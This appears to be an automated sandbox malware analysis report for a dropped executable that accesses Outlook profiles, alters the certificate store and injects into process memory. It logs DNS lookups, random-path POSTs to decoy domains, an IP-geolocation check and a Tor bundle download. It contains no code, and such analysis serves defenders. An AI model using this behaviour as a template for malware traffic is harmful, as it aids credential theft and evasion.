  C:\Users\Admin\AppData\Local\Nvidia\B9a5797cb584014f3fede.exe
  2⤵
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - outlook_office_path
  - outlook_win_path
  PID:2400
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2400 -s 1724
    3⤵
    PID:2164

Network

DNS

pornhub.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

pornhub.com

IN A

Response

pornhub.com

IN A

66.254.114.41
DNS

google.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.179.142
DNS

openai.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

openai.com

IN A

Response

openai.com

IN A

13.107.213.67

openai.com

IN A

13.107.246.67
DNS

google.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

142.250.179.142
DNS

pornhub.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

pornhub.com

IN A

Response

pornhub.com

IN A

66.254.114.41
DNS

youtube.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

216.58.214.14
DNS

ip-api.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
DNS

blockchain.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

blockchain.com

IN A

Response

blockchain.com

IN A

104.16.30.98

blockchain.com

IN A

104.16.29.98
DNS

youtube.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

216.58.214.14
DNS

eset.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

eset.com

IN A

Response

eset.com

IN A

91.228.166.47

eset.com

IN A

91.228.167.128
DNS

archive.torproject.org

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

archive.torproject.org

IN A

Response

archive.torproject.org

IN CNAME

archive-01.torproject.org

archive-01.torproject.org

IN A

159.69.63.226
DNS

blockchain.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

blockchain.com

IN A

Response

blockchain.com

IN A

104.16.30.98

blockchain.com

IN A

104.16.29.98
POST

http://openai.com/ScdEUc6SlP?q=1

B9a5797cb584014f3fede.exe

Remote address:

13.107.213.67:80

Request

POST /ScdEUc6SlP?q=1 HTTP/1.1
Host: openai.com
Content-Length: 121
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 307 Temporary Redirect

Date: Sat, 14 Oct 2023 18:20:58 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: https://openai.com/ScdEUc6SlP?q=1
x-azure-ref: 20231014T182058Z-8pshx3ug9h0nd9d4k0nc7gyz3g00000007ug00000000rpcn
X-Cache: CONFIG_NOCACHE
GET

http://pornhub.com/nZJ8XB6TLb?q=129

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:80

Request

GET /nZJ8XB6TLb?q=129 HTTP/1.1
Host: pornhub.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

content-length: 0
location: https://pornhub.com/nZJ8XB6TLb?q=129
POST

http://google.com/xINnIoXK0o?q=0

B9a5797cb584014f3fede.exe

Remote address:

142.250.179.142:80

Request

POST /xINnIoXK0o?q=0 HTTP/1.1
Host: google.com
Content-Length: 189
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Sat, 14 Oct 2023 18:20:59 GMT
Connection: close
POST

http://google.com/xINnIoXK0o?q=0

B9a5797cb584014f3fede.exe

Remote address:

142.250.179.142:80

Request

POST /xINnIoXK0o?q=0 HTTP/1.1
Host: google.com
Content-Length: 189
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Sat, 14 Oct 2023 18:20:59 GMT
Connection: close
GET

https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz

B9a5797cb584014f3fede.exe

Remote address:

159.69.63.226:443

Request

GET /tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz HTTP/1.1
Host: archive.torproject.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://uy3qxvwzwoeztnellvvhxh7ju7kfvlsauka7avilcjg7domzxptbq7qd.onion/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz
Last-Modified: Thu, 16 Mar 2023 15:33:36 GMT
ETag: "d42801-5f7062f2cbbbf"
Accept-Ranges: bytes
Content-Length: 13903873
Cache-Control: max-age=2592000
Expires: Mon, 13 Nov 2023 18:20:59 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-gzip
Content-Language: en
POST

http://pornhub.com/YvXAWrkHSP?q=0

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:80

Request

POST /YvXAWrkHSP?q=0 HTTP/1.1
Host: pornhub.com
Content-Length: 125
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

content-length: 0
location: https://pornhub.com/YvXAWrkHSP?q=0
connection: close
GET

http://openai.com/ftOpuXgkwC?q=229

B9a5797cb584014f3fede.exe

Remote address:

13.107.213.67:80

Request

GET /ftOpuXgkwC?q=229 HTTP/1.1
Host: openai.com
Connection: Keep-Alive

Response

HTTP/1.1 307 Temporary Redirect

Date: Sat, 14 Oct 2023 18:20:58 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: https://openai.com/ftOpuXgkwC?q=229
x-azure-ref: 20231014T182058Z-t0wduq2e3x3sf7qndnf55yas5000000000b000000001tbby
X-Cache: CONFIG_NOCACHE
GET

http://ip-api.com/line?fields=query,country

B9a5797cb584014f3fede.exe

Remote address:

208.95.112.1:80

Request

GET /line?fields=query,country HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 14 Oct 2023 18:20:58 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 25
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
POST

http://eset.com/0O9WHnWMZM?q=0

B9a5797cb584014f3fede.exe

Remote address:

91.228.166.47:80

Request

POST /0O9WHnWMZM?q=0 HTTP/1.1
Host: eset.com
Content-Length: 113
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Sat, 14 Oct 2023 18:20:58 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://www.eset.com/0O9WHnWMZM?q=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
POST

http://youtube.com/Ep3hnbR6IC?q=0

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /Ep3hnbR6IC?q=0 HTTP/1.1
Host: youtube.com
Content-Length: 162
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/Ep3hnbR6IC?q=0

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /Ep3hnbR6IC?q=0 HTTP/1.1
Host: youtube.com
Content-Length: 162
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/Ep3hnbR6IC?q=0

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /Ep3hnbR6IC?q=0 HTTP/1.1
Host: youtube.com
Content-Length: 162
Expect: 100-continue

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/wsVZjAbAO0?q=2

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /wsVZjAbAO0?q=2 HTTP/1.1
Host: youtube.com
Content-Length: 0

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:20:59 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://youtube.com/Ep3hnbR6IC?q=0

B9a5797cb584014f3fede.exe

Remote address:

216.58.214.14:80

Request

POST /Ep3hnbR6IC?q=0 HTTP/1.1
Host: youtube.com
Content-Length: 162
Expect: 100-continue

Response

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=utf-8
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 14 Oct 2023 18:21:00 GMT
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:20:58 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:20:58 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d6e45db266d8-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:20:58 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:20:58 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d6e49dfb66d8-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:20:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:20:58 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d6e4ae0f66d8-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:20:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:20:59 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d6e51e8566d8-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:20:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:20:59 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d6e53ea766d8-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:20:58 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:20:58 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d6e45bd06720-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:20:58 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:20:58 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d6e49c2e6720-AMS
GET

https://pornhub.com/nZJ8XB6TLb?q=129

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:443

Request

GET /nZJ8XB6TLb?q=129 HTTP/1.1
Host: pornhub.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

server: openresty
date: Sat, 14 Oct 2023 18:20:59 GMT
content-type: text/html
content-length: 166
location: https://www.pornhub.com/nZJ8XB6TLb?q=129
x-frame-options: SAMEORIGIN
rating: RTA-5042-1996-1400-1577-RTA
set-cookie: __s=652ADC0A-42FE722901BB1C2393-A15698F; Secure; Samesite=None
set-cookie: __l=652ADC0A-42FE722901BB1C2393-A15698F; Secure; Samesite=None; Max-Age=31556926
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://openai.com/ftOpuXgkwC?q=229

B9a5797cb584014f3fede.exe

Remote address:

13.107.213.67:443

Request

GET /ftOpuXgkwC?q=229 HTTP/1.1
Host: openai.com
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sat, 14 Oct 2023 18:20:59 GMT
Content-Type: text/html
Content-Length: 1944
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Range: bytes 0-1943/1944
ETag: "48563893"
Last-Modified: Fri, 13 Oct 2023 23:39:46 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Referrer-Policy: same-origin
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' 'unsafe-eval' 'sha256-Fu6BQZHI9lIev81cMzan2gbFLQJijUWL2tHnvhvYP1k=' 'sha256-B9HPo9/jX4atLVuuhcrzSKwMHW+UCXph8cK5JNCTkZM=' https://api.observablehq.com https://cdn.jsdelivr.net https://cdn.openai.com https://unpkg.com https://www.googletagmanager.com https://static.cloudflareinsights.com; style-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://github.githubassets.com; img-src 'self' data: https: https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://i.vimeocdn.com https://images.openai.com; font-src 'self' data: https://use.typekit.net https://cdn.jsdelivr.net https://fonts.gstatic.com; connect-src 'self' *.google-analytics.com https://region1.google-analytics.com https://cdnmd.global-cache.online https://translate.googleapis.com https://cloudflareinsights.com https://cdn.jsdelivr.net https://cdn.openai.com https://d4mucfpksywv.cloudfront.net https://gist.githubusercontent.com https://o33249.ingest.sentry.io https://openaicom-api-bdcpf8c6d2e9atf6.z01.azurefd.net https://static.observableusercontent.com https://www.google-analytics.com; media-src 'self' data: https://translate.google.com https://cdn.openai.com https://openaicomproductionae4b.blob.core.windows.net; object-src 'none'; frame-src 'self' https://vimeo.com https://openaipublic.blob.core.windows.net https://platform.twitter.com https://www.instagram.com https://m.youtube.com https://player.twitch.tv https://player.vimeo.com https://w.soundcloud.com; base-uri 'self'; manifest-src 'self'; report-uri https://oaic.report-uri.com/r/d/csp/reportOnly
x-azure-ref: 20231014T182059Z-b94v73cm5x443981gazmp3p5p400000002a000000001gnyk
X-Cache: TCP_MISS
GET

https://pornhub.com/YvXAWrkHSP?q=0

B9a5797cb584014f3fede.exe

Remote address:

66.254.114.41:443

Request

GET /YvXAWrkHSP?q=0 HTTP/1.1
Host: pornhub.com
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently

server: openresty
date: Sat, 14 Oct 2023 18:20:59 GMT
content-type: text/html
content-length: 166
location: https://www.pornhub.com/YvXAWrkHSP?q=0
x-frame-options: SAMEORIGIN
rating: RTA-5042-1996-1400-1577-RTA
set-cookie: __s=652ADC0A-42FE722901BB54E8A-A7BD9C9; Secure; Samesite=None
set-cookie: __l=652ADC0A-42FE722901BB54E8A-A7BD9C9; Secure; Samesite=None; Max-Age=31556926
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
POST

https://openai.com/ScdEUc6SlP?q=1

B9a5797cb584014f3fede.exe

Remote address:

13.107.213.67:443

Request

POST /ScdEUc6SlP?q=1 HTTP/1.1
Host: openai.com
Content-Length: 121
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 405 Method Not Allowed

Cache-Control: no-cache
Allow: GET, HEAD, OPTIONS
X-Cache: CONFIG_NOCACHE
X-Azure-Ref: 0DNwqZQAAAABqCvWc0YhwQIRyCYTTUP1QQlJVMzBFREdFMTEwOAA3ZjE3YzA2NC00MTQ5LTQ2ODctOTk4Yy00ZDliMjE2YjI1OGY=
Date: Sat, 14 Oct 2023 18:20:59 GMT
Content-Length: 0
POST

http://google.com/xINnIoXK0o?q=0

B9a5797cb584014f3fede.exe

Remote address:

142.250.179.142:80

Request

POST /xINnIoXK0o?q=0 HTTP/1.1
Host: google.com
Content-Length: 189
Expect: 100-continue

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Sat, 14 Oct 2023 18:20:59 GMT
Connection: close
POST

http://google.com/xINnIoXK0o?q=0

B9a5797cb584014f3fede.exe

Remote address:

142.250.179.142:80

Request

POST /xINnIoXK0o?q=0 HTTP/1.1
Host: google.com
Content-Length: 189
Expect: 100-continue

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1571
Date: Sat, 14 Oct 2023 18:20:59 GMT
Connection: close
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:20:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:20:59 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d6e53c866655-AMS
POST

http://blockchain.com/GjMLkoZqDj?q=1

B9a5797cb584014f3fede.exe

Remote address:

104.16.30.98:80

Request

POST /GjMLkoZqDj?q=1 HTTP/1.1
Host: blockchain.com
Content-Length: 202
Expect: 100-continue

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 14 Oct 2023 18:20:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sat, 14 Oct 2023 19:20:59 GMT
Location: https://www.blockchain.com/GjMLkoZqDj?q=1
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8161d6e55c926655-AMS
DNS

www.blockchain.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

www.blockchain.com

IN A

Response

www.blockchain.com

IN A

104.16.29.98

www.blockchain.com

IN A

104.16.30.98
DNS

www.eset.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

www.eset.com

IN A

Response

www.eset.com

IN CNAME

www-eset-com.trafficmanager.net

www-eset-com.trafficmanager.net

IN CNAME

www.eset.com.edgesuite.net

www.eset.com.edgesuite.net

IN CNAME

a1281.dscr.akamai.net

a1281.dscr.akamai.net

IN A

23.72.252.169

a1281.dscr.akamai.net

IN A

23.72.252.139
DNS

www.blockchain.com

B9a5797cb584014f3fede.exe

Remote address:

8.8.8.8:53

Request

www.blockchain.com

IN A

Response

www.blockchain.com

IN A

104.16.30.98

www.blockchain.com

IN A

